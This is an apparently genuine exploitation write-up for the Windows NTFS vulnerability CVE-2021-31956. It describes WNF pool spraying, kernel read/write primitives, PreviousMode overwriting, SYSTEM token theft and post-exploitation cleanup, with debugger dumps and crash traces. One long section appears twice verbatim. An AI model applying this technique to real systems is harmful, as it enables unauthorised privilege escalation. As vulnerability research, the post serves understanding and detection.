I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.
Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).
Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structure are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems. The hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides a abstraction layer to deal with differences between hardware.

Processes and threads are represeted at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory which is called from NtWriteVirtualMemory we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written too:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread.

At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE prior to the _KPROCESS ThreadListHead Flink we can leak out the value by confusing it with the DataSize and the ChangeTimestamp, we can then calculate the FLINK as “FLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize` after querying the object.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.

Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  &quot;???&quot;

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
+ 0x000 Header           : _WNF_NODE_HEADER
+ 0x004 AllocatedSize : 0xffff900f
+ 0x008 DataSize : 3
+ 0x00c ChangeStamp : 0

Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3 byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), of which the PreviousMode is included (i.e set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer with it always being a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward to use arbitrary read/write to a better method which enables easier post exploitation and enhanced clean up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit but due to the potentially large amount of memory writes needing to occur for exploit success, then it could leave the kernel in a bad state. Also, when the process terminates then certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenario’s (red teams / simulated attacks etc) where stability and reliability are important. Going through this process also helps understand how these types of attacks can also be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM but PreviousMode is still set to 0. Then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is free’d when the _WNF_NAME_INSTANCE is freed on process termination (incidentially also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
